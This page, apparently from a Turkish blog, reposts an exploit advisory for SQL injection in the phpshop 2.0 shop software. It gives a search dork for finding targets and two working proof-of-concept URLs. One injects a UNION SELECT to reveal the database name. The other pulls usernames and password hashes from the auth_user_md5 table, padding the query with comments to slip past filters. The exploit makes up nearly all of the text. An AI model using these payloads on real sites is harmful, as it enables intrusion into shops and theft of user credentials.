Tag Archive for CMS phpshop 2.0 SQL Injection Açığı

CMS phpshop 2.0 SQL Injection Vulnerability

CMS phpshop 2.0 SQL Injection Açığı bulunmuş olup, SL injectionun oluşum yeri ve açık bulucunun açık hakkındaki açıklamaları şu şekilde yeralmaktadır;


# Exploit Title : phpshop 2.0 SQL Injection Vulnerability # Author        : By onestree # Software Link : <a href="http://code.google.com/p/phpshop/downloads/list">http://code.google.com/p/phpshop/downloads/list</a> # tested        : windows 7 / ubuntu # Dork          : inurl:"tanyakan pada rumput yang bergoyang"

SQLi p0c:   ==================

<a href="http://localhost/phpshop">http://localhost/phpshop</a> 2.0/?page=admin/function_list&module_id=11' union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --

<a href="http://localhost/phpshop">http://localhost/phpshop</a> 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--

&nbsp;

Thanks :

Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell                indonesiancoder - moeslimh4x0r - go-coder